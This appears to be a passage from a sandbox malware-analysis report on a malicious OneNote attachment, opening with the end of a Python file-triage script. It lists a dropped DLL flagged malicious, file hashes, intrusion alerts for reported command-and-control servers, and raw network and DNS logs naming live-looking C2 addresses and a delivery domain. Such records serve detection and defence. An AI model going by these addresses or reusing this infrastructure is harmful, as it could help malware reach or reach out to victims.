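if __name__ == "__main__":
    result = triage_dropped_file(BADUM_TSS, REPORTED_BADUM_TSS)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Worked by hand: "badum tss" has seven bytes that occur once and one ("s") that occurs twice, so the entropy is 7/9*log2(9) + 2/9*log2(9/2) = 2.9477..., which is the value the report prints. The same function on a block where every byte value is equally frequent returns 8.0, the ceiling that packed or encrypted payloads approach.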
                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):316928
                                                                                              Entropy (8bit):7.337848702590508
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                              MD5:BFC060937DC90B273ECCB6825145F298
                                                                                              SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                              SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                              SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                              • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                              • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                              • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                              • Filename: OMICS.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                              • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                              • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                              • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                              • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                              • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                              • Filename: 100935929722734787.one, Detection: malicious, Browse
                                                                                              • Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse
                                                                                              • Filename: 2023-03-16_1753.one, Detection: malicious, Browse
                                                                                              • Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
Process: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type: data
Category: dropped
Size (bytes): 25280
Entropy (8bit): 0.5433410247296293
Encrypted: false
SSDEEP: 48:PbnnYsDoODcOOErE5+9olgk8Z4GQTaza2egb:PbzoUOkI+6lAUaza2ee
MD5: D0642277D4B13D42E7606EF972F5AFE9
SHA1: ED016803728F5DDC3EA7346683C1F6D93A26F90B
SHA-256: BB4AC658CDF79F055414BB6981C415ABB9CA64C6CF47D1895FA1D7A8E0A3BEAE
SHA-512: 7FB1F165197D53E3B0CAE3ABDBD19755AFB0F61CA2E602FCC1A14828248E69A607B4CCF84A1C2E1A234F69C99DDAE7823F4044B7A572E3337526BC62E6A90AE3
Malicious: false
Process: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type: data
Category: dropped
Size (bytes): 3873
Entropy (8bit): 3.514272379585467
Encrypted: false
SSDEEP: 48:N8dQdO1aMIFVbqzqgdCDDGTCDfodRdQdO1aMh7+xGqzWk7dCDGWG5CDdZ0tgH:oKiqfGaoFqLZhgO4
MD5: 9AC073B56A8C9E131C96CEA3E1D410B2
SHA1: EA91260019132F020F365CDF5201C58D0ED6149E
SHA-256: F5CA8F18F25E2A9B8F571C4A721E53DC636AD5D4688E240104680352E31B41AE
SHA-512: A6615C16F9E199B00F4CF381B66BD936BFC21DE93129CD54E5D92CCACB81DEBA556D7F5E3CDE3711B93CD33CC58EC9828A8D372AE5B6D8D0FF3127C77A74115A
Malicious: false
Process: C:\Windows\System32\regsvr32.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 316928
Entropy (8bit): 7.337848702590508
Encrypted: false
SSDEEP: 6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5: BFC060937DC90B273ECCB6825145F298
SHA1: C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256: 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512: CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 58%
File type: data
Entropy (8bit): 6.730628431064467
TrID:
• Microsoft OneNote note (16024/2) 100.00%
File name: Insight_Medical_Publishing_3.one
File size: 120428
MD5: 0d8f675a79a32d286f8eccb2ff989c91
SHA1: e0796075d09841386c12f37503495c9624a3c393
SHA256: 7ef31d3538810c895812e331db91f905693b99b682d062d9d0b4dab5df0da0a2
SHA512: d1d81b41e35469ed748fb96998cdbfdaeffd7de481dc12486bd383d1e1e602a24c44c5e0ff4c0a016f0a12afee0a5d36a91f1c64c504918652ee40273b96141a
SSDEEP: 1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXE:1BoC+tCYvSMVnte8ZP1Y6JU
TLSH: C3C33BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D6DD8EF
Icon Hash: d4dce0626664606c
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | --- | --- | --- | ---
03/17/23-09:17:28.925917 | TCP | 2404330 | ET CNC Feodo Tracker Reported CnC Server TCP group 16 | 49686 | 7080 | 192.168.2.3 | 66.228.32.31
03/17/23-09:18:01.076339 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49694 | 8080 | 192.168.2.3 | 104.168.155.143
03/17/23-09:17:34.182038 | TCP | 2404312 | ET CNC Feodo Tracker Reported CnC Server TCP group 7 | 49687 | 443 | 192.168.2.3 | 182.162.143.56
03/17/23-09:17:19.192203 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49684 | 8080 | 192.168.2.3 | 91.121.146.47
03/17/23-09:17:48.416747 | TCP | 2404308 | ET CNC Feodo Tracker Reported CnC Server TCP group 5 | 49689 | 8080 | 192.168.2.3 | 167.172.199.165
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Mar 17, 2023 09:16:38.362890959 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362914085 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362914085 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362935066 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363054991 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363127947 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363126993 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363126993 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363173008 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363286018 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363363981 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363363981 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363368034 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363389969 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363465071 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363480091 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363526106 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363586903 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363636017 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363636017 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363648891 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363673925 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363694906 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363778114 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363822937 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363869905 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363869905 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.364198923 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.421921968 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.421964884 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.422034979 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.422044992 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.192203045 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.222104073 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.222409010 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.227174044 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.256474972 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276632071 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276680946 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276835918 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.287417889 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.317715883 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.362380981 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.163307905 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.163410902 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.191144943 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:21.689898014 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:21.737715006 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.689871073 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.689913034 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.690076113 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.735851049 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.735912085 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.763818979 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.763869047 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:28.925916910 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.026180983 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.026325941 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.037509918 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.141081095 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148432016 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148479939 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148572922 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.157700062 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.258588076 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.264183998 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.406485081 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:30.216989040 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:30.269695997 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.217888117 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.217945099 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.218170881 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.218358994 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.218449116 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.318165064 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.318198919 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.182038069 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.182136059 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.182271004 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.183058977 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.183100939 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.978096962 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.978301048 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.985789061 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.985817909 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.986380100 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.987706900 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.987730026 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092010975 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092142105 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092259884 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092884064 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092909098 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092940092 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092974901 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.171070099 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.398536921 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.399653912 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.400696039 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.627909899 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643374920 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643405914 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643577099 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.647331953 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.875297070 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.884608984 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:41.151254892 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:42.176580906 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:42.223731995 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.176423073 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.176465034 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.176712990 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.493266106 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.493411064 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.720385075 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.720431089 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:48.416747093 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:48.585005999 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:49.099303007 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:49.266845942 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:49.771209955 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:49.939126015 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.418833017 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.418896914 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.418972015 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.419821978 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.419852018 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.454278946 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.455209970 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.455261946 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.455347061 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.456340075 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.456363916 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.490653992 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.491842985 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.491914988 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.492007017 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.492810965 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.492846012 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.530214071 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.532516003 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.532592058 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.532685995 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.533261061 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.533292055 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.568703890 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:18:01.076339006 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:01.240555048 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:01.740967989 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:01.909027100 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:02.430157900 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:02.595954895 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:09.420943975 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:09.625969887 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:10.132339001 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:10.337409973 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:10.851165056 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:11.056092978 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:16.426006079 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:19.430021048 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:25.461776018 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:32.609797955 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.609858990 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.609966040 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.610491037 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.610502958 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.876173973 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.877259970 CET49698443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.877319098 CET44349698159.89.202.34192.168.2.3
Mar 17, 2023 09:18:32.877496958 CET | 49698 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:32.878015995 CET | 49698 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:32.878040075 CET | 443 | 49698 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.137538910 CET | 443 | 49698 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.139899969 CET | 49699 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.139976978 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.140122890 CET | 49699 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.141849995 CET | 49699 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.141891003 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.399760962 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.401052952 CET | 49700 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.401118040 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.401213884 CET | 49700 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.401853085 CET | 49700 | 443 | 192.168.2.3 | 159.89.202.34
Mar 17, 2023 09:18:33.401875973 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.3
Mar 17, 2023 09:18:33.668292999 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2023 09:16:35.870768070 CET | 58974 | 53 | 192.168.2.3 | 8.8.8.8
Mar 17, 2023 09:16:35.890346050 CET | 53 | 58974 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 17, 2023 09:16:35.870768070 CET | 192.168.2.3 | 8.8.8.8 | 0x11ba | Standard query (0) | penshorn.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 17, 2023 09:16:29.040373087 CET | 8.8.8.8 | 192.168.2.3 | 0x99d2 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.242.128 | A (IP address) | IN (0x0001) | false
Mar 17, 2023 09:16:29.040373087 CET | 8.8.8.8 | 192.168.2.3 | 0x99d2 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.236.128 | A (IP address) | IN (0x0001) | false
Mar 17, 2023 09:16:35.890346050 CET | 8.8.8.8 | 192.168.2.3 | 0x11ba | No error (0) | penshorn.org | | 203.26.41.131 | A (IP address) | IN (0x0001) | false
Mar 17, 2023 09:17:19.883671045 CET | 8.8.8.8 | 192.168.2.3 | 0xb6f0 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.192 | A (IP address) | IN (0x0001) | false
• penshorn.org
• 182.162.143.56
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49683 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49687 | 182.162.143.56 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49688 | 187.63.160.88 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Mar 17, 2023 09:17:40.400696039 CET | 527 | OUT | Data Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 92 a3 7c 81 97 32 54 2e a1 30 fe 69 bb 61 75 6e 2d 66 38 d1 fb 0f 9d aa 53 34 3b 8a 6a 9d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
Data Ascii: d|2T.0iaun-f8S4;j*,+0/$#('=<5/@#
Mar 17, 2023 09:17:40.643374920 CET | 528 | IN | Data Raw: 16 03 03 00 41 02 00 00 3d 03 03 ed bc 56 50 0c 18 6f c3 15 e7 b5 d1 55 2c 4e 6c 9c 5a a7 23 b0 0d 3e f9 5a 41 5a 6e ee be f7 e0 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8
Data Ascii: A=VPoU,NlZ#>ZAZn0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
Mar 17, 2023 09:17:40.643405914 CET | 529 | IN | Data Raw: d9 c2 28 c2 20 da 78 ef 47 61 47 9b fb 22 36 ca d8 5f 8e a3 be 43 d7 7c cf 12 c6 60 48 b5 74 02 d7 e4 c8 c1 a9 0c 14 d8 1e 3e 15 03 b7 d4 8a 84 0f 1c 92 39 11 96 74 51 7e d7 41 c6 d7 cd ce f4 4d 33 0d f9 06 16 03 03 00 04 0e 00 00 00
Data Ascii: ( xGaG"6_C|`Ht>9tQ~AM3
Mar 17, 2023 09:17:40.647331953 CET | 529 | OUT | Data Raw: 16 03 03 00 25 10 00 00 21 20 96 92 29 51 6e be d8 5b 6d 6b 2c cb 56 1b 86 08 8b 7f 3a 90 f7 6e 53 f2 fb 78 63 3b 5c b5 3d 2f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b9 38 7a 70 d8 7d 3e a5 92 4f 95 1c 74 6d cf 00 39 5e 68 4c de
Data Ascii: %! )Qn[mk,V:nSxc;\=/(8zp}>Otm9^hL'Mo1hC
Mar 17, 2023 09:17:40.875297070 CET | 529 | IN | Data Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 96 5e 30 3f 6a 28 cd a4 84 8b 33 3c f0 a4 91 7a 29 3e 1b 65 b1 fc b9 20 d0 03 38 cc 4b 39 11 7b 13 be c3 4a b0 1f 0a fa a4 d5 d1 dd f0 9f 50 18 61 ca ba
Data Ascii: ,A1NatBI^0?j(3<z)>e 8K9{JPaVS.Yfb673'Q4B}znVKa3M2m<M6JNcA%7(CLLlJe;d##?
